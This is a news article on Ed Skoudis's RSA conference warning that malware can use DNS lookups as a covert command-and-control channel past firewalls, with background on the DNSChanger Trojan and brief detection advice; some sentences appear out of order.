bigger businesses take longer to discover security breaches. The DNSchanger Trojan, which was in the wild in 2009 and whose proprietors were busted last November, is still leaving damage behind in government systems days before a scheduled deadline (now extended) for it to have been eradicated.One of the more embarrassing revelations from last week's RSA Security conference in San Francisco was that
And yet the DNS changing malware - so deceptively simple it can't even legitimately be called a hack - may yet be undetected in targeted systems. At RSA last week, SANS Institute Faculty Fellow Ed Skoudis, a world-renowned author in the anti-malware field for over two decades, reiterated the dangers of leaving the DNS command and control channel open to outside influence.
In the past decade, malicious agents would craft or deploy back doors that would listen to enterprises' Internet activity through the inbound connection of TCP ports. Some of them were detectable through port scans, which became a regular procedure in scouring for bad actors.
Skoudis told RSA last week that back doors have since evolved, leveraging their ability to take over DNS to utilize enterprises' outbound connections. Most networks are, after all, configured to allow for outbound traffic. Some of that outbound traffic even uses SSL or TLS encryption, using HTTPS protocol. And some modern malware today even gets its commands from loosely masqueraded Twitter feeds, or Facebook or YouTube comments. If you've been wondering about the proliferation of nonsensical Twitter feeds and thinking, what exactly are they doing, now you know.
"The issue here, though, is that each of these mechanisms requires the malware on the affected machine to have a direct outbound connection to where the bad guy places his commands," Skoudis explained. "So if we as defenders could sever that connection - if the inbound machine can't get out - we fix the problem... well, not so much."
After feigning a self-correction, Skoudis went on to explain that modern malware now acts as DNS servers inside the computer, resolving certain names internally before passing on unresolved requests to real DNS servers on the Internet. That position inside the machine gives malicious agents command and control, he explained, pointing to the possibility of a name resolution system that works exclusively for malware that resolves commands that aren't even properly formed DNS requests.
And so much for the firewall. "With malware on the infected machine... that machine does not have outbound connectivity at all. If it tries to send traffic through the firewall, it's blocked. No TCP, no UDP, no ICMP. Instead, it sends a DNS query just to its internal DNS server. The internal DNS server then looks that name up for it by maybe sending it to an external DNS server on the DMZ, which may even forward out to an external DNS server on the Internet, which could do a full recursive lookup, ultimately getting to the bad guys' server."
That recursive lookup could be capable of fetching back a command, which is delivered to the malicious DNS server inside infected computers and then executed, perhaps with elevated authority. "This is very subtle," said Skoudis.
The FBI's indictment against the Estonian proprietors of the DNSChanger malware last November told a story of how the malware redirected DNS queries to one of a surprisingly large, amassed networked of DNS server addresses. The sole objective there was allegedly to display ads their system hosted in place of ads and pages that users frequently visit - for example, instead of Yahoo or Netflix or even the IRS. Ed Skoudis' warning is of something even more sinister. He speaks of a distribution mechanism where, ultimately, an agent on your computer and an agent in the Internet have full communication with one another outside of firewalls, by masquerading as the service upon which the Web completely depends: the domain name resolution system. If getting the malware inside your machine is as easy as the DNSChanger folks demonstrated - by having an upstream server masquerade as the DHCP configuration server normally used by Wi-Fi routers - then there could be a gaping security hole in the Internet right now. In a backwards way, the DNSChanger folks may have done the world a favor.
One free tool Skoudis suggested is DNSCAT by Ron Bowes. "First, look for unusual DNS traffic. This introduces strange patterns of DNS traffic, very frequent barrages of requests, maybe sent to places in the world that you're not normally doing business in." While logging all DNS responses would cause systems to take too big a performance hit, simply sniffing outbound requests on the perimeter network could reveal anomalous patterns or unusually long queries with strange names.His suggestions for defending against this vulnerability:
The theoretical ability for such a malicious network to be established has existed perhaps since the beginning of the Internet, Skoudis told the RSA audience, though he's only seeing it put to the test recently - with a new set of tools responsible for at least two large-scale breaches he's seen within the last eight months.
Stock image by Shutterstock.